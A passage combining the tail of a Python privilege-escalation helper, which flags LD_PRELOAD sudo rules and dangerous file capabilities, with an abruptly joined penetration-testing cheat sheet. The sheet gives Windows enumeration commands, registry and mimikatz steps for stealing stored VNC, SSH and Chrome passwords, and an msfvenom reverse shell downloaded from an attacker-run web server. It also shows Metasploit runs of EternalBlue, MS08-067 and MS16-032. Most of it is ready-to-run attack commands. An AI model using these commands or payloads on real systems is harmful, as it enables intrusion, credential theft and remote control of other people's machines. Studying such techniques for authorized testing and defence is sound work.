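        for m in re.finditer(r"env_keep\+?=(\S+)", line):
            env_keep.extend(v.strip('"') for v in m.group(1).rstrip(",").split(","))
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m.group("runas"),
                          "nopasswd": "NOPASSWD" in m.group("tags"),
                          "command": m.group("cmd").strip()})
    return {"env_keep": env_keep, "rules": rules}


def ld_preload_vectors(sudo):
    """Commands usable for the LD_PRELOAD trick: sudo must keep LD_PRELOAD and
    the rule must run as root; an absolute command path does not protect against it."""
    if "LD_PRELOAD" not in sudo["env_keep"]:
        return []
    return [r["command"] for r in sudo["rules"] if r["runas"] in ("ALL", "root")]


def parse_getcap(text):
    """Parses getcap -r output into [(path, {capability names})]."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"^(?P<path>\S+)\s*=?\s*(?P<caps>.*cap_.*)$", line.strip())
        if m:
            names = set(re.findall(r"cap_[a-z_]+", m.group("caps")))
            entries.append((m.group("path"), names))
    return entries


def dangerous_caps(entries):
    """Binaries carrying a capability from DANGEROUS_CAPS, with the offending caps."""
    return [(path, sorted(caps & DANGEROUS_CAPS))
            for path, caps in entries if caps & DANGEROUS_CAPS]


if __name__ == "__main__":
    sudo = parse_sudo_l(SUDO_L_SAMPLE)
    print("env_keep:", sudo["env_keep"])
    print("LD_PRELOAD vectors:", ld_preload_vectors(sudo))
    print("dangerous caps:", dangerous_caps(parse_getcap(GETCAP_SAMPLE)))
```

The python3 rule without NOPASSWD is still listed: LD_PRELOAD only needs the command to run as root, the password prompt is the user's own. The systemctl rule runs as www-data and is excluded, though a rule like it can still matter for lateral movement.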
screen 4.5.0: known local privil
ege escalation in the SUID screen binary
Metasploit Framework (post/multi/recon/local_exploit_suggester) and Linux Exploit Suggester to find applicable kernel and local exploits
Get-ComputerInfo
Get-NetIPAddress
ipconfig
arp -a
Get-LocalUser
Get-LocalGroup
cat (Get-PSReadlineOption).HistorySavePath
Get-WinEvent -LogName "Windows PowerShell"
Get-Clipboard
PS C:\Users\user\Desktop> .\accesschk64.exe (Sysinternals AccessChk: check permissions on services, files and registry keys)
search for the word "password" and filter on .conf files:
cd "C:\Program Files"
Get-ChildItem -Recurse -ErrorAction SilentlyContinue | Select-String "password" -List | select path | where path -like "*.conf"
Service passwords and keys in the registry:
Get-ItemProperty "HKCU:\Software\ORL\WinVNC3\Password"
Get-ItemProperty "HKCU:\Software\TightVNC\Server" Password
Get-ItemProperty "HKLM:\Software\TightVNC\Server" Password
Get-ItemProperty "HKCU:\Software\OpenSSH\Agent\Keys"
Get-ItemProperty "HKLM:\Software\OpenSSH\Agent\Keys"
Browser passwords (mimikatz: Chrome's Login Data decrypted with the user's DPAPI master key):
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:<MASTERKEY>
attacker machine: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP ADDRESS> LPORT=4343 -f exe -o reverse.exe
attacker machine: python -m http.server (serves the current directory on port 8000)
target machine: Invoke-WebRequest -Uri "http://<IP ADDRESS>:8000/reverse.exe" -OutFile .\Desktop\reverse.exe
start the listener (nc -lvp 4343, or exploit/multi/handler with the same payload) before running reverse.exe on the target
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set RHOST <IP>
msf exploit(ms17_010_eternalblue) > run
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST <IP>
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
msf exploit(ms08_067_netapi) > exploit
msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets
...
msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET <target-id>
msf exploit(ms16_032_secondary_logon_handle_privesc) > show options
...
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit